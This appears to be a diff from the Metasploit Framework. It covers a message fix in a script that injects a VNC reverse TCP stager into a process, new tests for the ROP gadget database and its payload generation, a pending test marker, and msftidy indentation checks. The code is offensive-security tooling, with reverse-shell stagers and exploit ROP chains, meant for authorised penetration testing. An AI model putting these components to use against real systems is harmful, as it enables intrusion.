rescue::Exception => e
print_error("Failed to Inject Payload to #{target_pid}!")
print_error(e)
print_error(e.message)
end
end

View File

@ -95,7 +95,7 @@ if (tunnel)
pay.datastore['LPORT'] = rport
pay.datastore['VNCPORT'] = vport
else
print_status("Creating a VNC reverse tcp stager: LHOST=#{rhost} LPORT=#{rport})")
print_status("Creating a VNC reverse tcp stager: LHOST=#{rhost} LPORT=#{rport}")
payload = "windows/vncinject/reverse_tcp"
pay = client.framework.payloads.create(payload)

View File

@ -12,6 +12,8 @@ describe Msf::Util::EXE do
described_class
end
before { pending "Pending RM#8463, fix all these these tests up." }
$framework = Msf::Simple::Framework.create(
:module_types => [ Msf::MODULE_NOP ],
'DisableDatabase' => true

View File

@ -0,0 +1,91 @@
require 'rex/exploitation/ropdb'
describe Rex::Exploitation::RopDb do
context "Class methods" do
context ".initialize" do
it "should initialize with a path of the ROP database ready" do
ropdb = Rex::Exploitation::RopDb.new
ropdb.instance_variable_get(:@base_path).should =~ /data\/ropdb\/$/
end
end
context ".has_rop?" do
ropdb = Rex::Exploitation::RopDb.new
it "should find the msvcrt ROP database" do
ropdb.has_rop?("msvcrt").should eq(true)
end
it "should find the java ROP database" do
ropdb.has_rop?("java").should eq(true)
end
it "should find the hxds ROP database" do
ropdb.has_rop?("hxds").should eq(true)
end
it "should find the flash ROP database" do
ropdb.has_rop?("flash").should eq(true)
end
it "should return false when I supply an invalid database" do
ropdb.has_rop?("sinn3r").should eq(false)
end
end
context ".select_rop" do
ropdb = Rex::Exploitation::RopDb.new
it "should return msvcrt gadgets" do
gadgets = ropdb.select_rop('msvcrt')
gadgets.length.should > 0
end
it "should return msvcrt gadgets for windows server 2003" do
gadgets = ropdb.select_rop('msvcrt', {'target'=>'2003'})
gadgets.length.should > 0
end
it "should return msvcrt gadgets with a new base" do
gadgets1 = ropdb.select_rop('msvcrt')
gadgets2 = ropdb.select_rop('msvcrt', {'base'=>0x10000000})
gadgets2[0].should_not eq(gadgets1[0])
end
end
context ".generate_rop_payload" do
ropdb = Rex::Exploitation::RopDb.new
it "should generate my ROP payload" do
ropdb.generate_rop_payload('msvcrt', 'AAAA').should =~ /AAAA$/
end
it "should generate my ROP payload with my stack pivot" do
ropdb.generate_rop_payload('msvcrt', 'AAAA', {'pivot'=>'BBBB'}).should =~ /^BBBB/
end
end
context ".get_safe_size" do
ropdb = Rex::Exploitation::RopDb.new
it "should return 0xfffffed0 (value does not need to be modified to avoid null bytes)" do
ropdb.send(:get_safe_size, 304).should eq(0xfffffed0)
end
it "should return 0xfffffeff (value is modified to avoid null bytes)" do
ropdb.send(:get_safe_size, 256).should eq(0xfffffeff)
end
end
context ".get_unsafe_size" do
ropdb = Rex::Exploitation::RopDb.new
it "should return 0xfffffc00 (contains a null byte)" do
ropdb.send(:get_unsafe_size, 1024).should eq(0xfffffc00)
end
end
end
end

View File

@ -361,12 +361,16 @@ class Msftidy
warn("Spaces at EOL", idx)
end
# Allow tabs or spaces as indent characters, but not both.
# This should check for spaces only on October 8, 2013
# Check for mixed tab/spaces. Upgrade this to an error() soon.
if (ln.length > 1) and (ln =~ /^([\t ]*)/) and ($1.match(/\x20\x09|\x09\x20/))
warn("Space-Tab mixed indent: #{ln.inspect}", idx)
end
# Check for tabs. Upgrade this to an error() soon.
if (ln.length > 1) and (ln =~ /^\x09/)
warn("Tabbed indent: #{ln.inspect}", idx)
end
if ln =~ /\r$/
warn("Carriage return EOL", idx)
end